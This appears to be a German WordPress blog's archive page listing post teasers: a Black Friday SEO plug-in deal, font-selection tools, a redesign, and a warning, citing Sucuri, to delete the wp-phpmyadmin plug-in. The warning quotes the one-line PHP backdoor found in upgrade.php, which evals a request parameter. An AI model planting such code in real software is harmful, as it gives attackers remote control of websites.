Wordpress

Black Friday: wpseo zum Sparpreis

Hier noch ein Black Friday Schnäppchen: wpseo von Sergej Müller ist ein SEO Plug-in für WordPress, ich neige dazu zu sagen es ist DAS SEO Plug-in was du brauchst – siehe auch meine Top 11 Lister der Must Have WordPress Plug-Ins. Ich nutze WPSEO, in der Premium Version (Werbelink), hier auf diesem Blog und auch auf meinen anderen Blogs. Die im Black Friday Sale angebotene Classic Lizenz kann man (nur) auf einem Blog nutzen, das sollte für viele aber bestimmt…

Internet Wordpress

Hilfreiche Tools zur Font Auswahl für dein Blog

Das Problem kennt jeder – 20 Tausend Fonts auf dem PC – aber welchen soll ich für mein Blog / Webseite nehmen? Das Wichtigste am Anfang – man sollte einen Font wählen der bei den meisten Benutzern dann auch angezeigt werden kann – dazu muss der genutzte Font beim Seitenbesucher auf dem PC, Mac oder Tablet vorhanden sein, ansonsten wird der Font einfach ersetzt. Mit einigen Fonts ist man quasi immer auf der sicheren Seite da diese mit dem Betriebssystem…

Wordpress

wp-phpmyadmin Plug-In – Jetzt löschen!

Nutzt du das WordPress Plug-In WP-phpmyadmin? Dann solltest du es jetzt laut den Sucuri Experten sofort löschen. Die Security Experten haben verschiedenen Seiten gesehen welche durch die Nutzung von wp-phpmyadmin gehackt wurden. Der Angriff hat durch eine Backdoor statt gefunden, der folgende Code befand sich in der upgrade.php Datei: <?php if(isset($_REQUEST["asc"]))eval(stripslashes($_REQUEST["asc"])); ?> Dieser Teil ist laut Sucuri nicht Bestandteil des Plug-Ins und erlaubt den Remote Zugriff auf die WordPress Installation. Das Plug-In soll Zugriff auf phpMyAdmin direkt aus WordPress heraus…

Wordpress

Neuer Look für thingybob.de

Ihr habt es gemerkt, ich habe meinem Blog einen neuen Look verpasst. Auf der stetigen Suche mein Blog zu verbessern dachte ich mir, dass ich doch nochmal etwas am Look machen sollte und möchte. Ich bin grundsätzlich Freund von dunklen Farben, aber ich fand es dann für mein Blog doch nicht mehr so wirklich passend. So sah thingybob zuerst aus: Dunkler Hintergrund, schwarzer Background für die Posts, weiße Schrift. Das Theme ist von Themeshift.de – die Jungs haben ziemlich schicke…